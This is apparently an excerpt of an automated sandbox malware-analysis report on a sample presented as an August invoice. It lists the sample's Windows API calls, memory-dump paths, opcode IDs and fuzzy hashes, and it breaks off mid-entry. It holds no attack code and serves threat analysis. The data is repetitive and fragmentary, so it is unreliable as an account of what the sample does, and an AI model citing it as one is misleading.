                                                          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 3850602802-3636473452
                                                          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                          • String ID:
                                                          • API String ID: 3985565216-0
                                                          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                          APIs
                                                          • _malloc.LIBCMT ref: 0041F707
                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                          • _free.LIBCMT ref: 0041F71A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free_malloc
                                                          • String ID: [B
                                                          • API String ID: 1020059152-632041663
                                                          • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                          • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                          APIs
                                                          • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                          • __calloc_crt.LIBCMT ref: 00413DB0
                                                          • __getptd.LIBCMT ref: 00413DBD
                                                          • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                          • _free.LIBCMT ref: 00413E07
                                                          • __dosmaperr.LIBCMT ref: 00413E12
                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                          • String ID:
                                                          • API String ID: 155776804-0
                                                          • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                          • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                          • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                          • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                          APIs
                                                            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                          APIs
                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                          • String ID:
                                                          • API String ID: 259663610-0
                                                          • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                          • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                          • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                          • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 004302E6
                                                          • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                          • GetClientRect.USER32(?,?), ref: 00430364
                                                          • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                          • GetWindowRect.USER32(?,?), ref: 004303C3
                                                          • ScreenToClient.USER32(?,?), ref: 004303EC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                          • String ID:
                                                          • API String ID: 3220332590-0
                                                          • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                          • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                          • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                          • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _malloc_wcslen$_strcat_wcscpy
                                                          • String ID:
                                                          • API String ID: 1612042205-0
                                                          • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                          • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                          • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                          • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove_strncmp
                                                          • String ID: >$U$\
                                                          • API String ID: 2666721431-237099441
                                                          • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                          • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                          • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                          • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 0044C570
                                                          • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$InputSend
                                                          • String ID:
                                                          • API String ID: 2221674350-0
                                                          • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                          • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                          • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                          • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$_wcscat
                                                          • String ID:
                                                          • API String ID: 2037614760-0
                                                          • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                          • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                          • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                          • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                          • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                          • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                          • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Variant$Copy$AllocClearErrorLastString
                                                          • String ID:
                                                          • API String ID: 960795272-0
                                                          • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                          • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                          • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                          • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                          APIs
                                                          • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                          • String ID:
                                                          • API String ID: 4189319755-0
                                                          • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                          • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                          • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                          • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                          APIs
                                                          • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                          • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                          • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow$InvalidateRect
                                                          • String ID:
                                                          • API String ID: 1976402638-0
                                                          • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                          • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                          • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                          • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                          APIs
                                                          • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                          • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                          • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                          • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                          • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
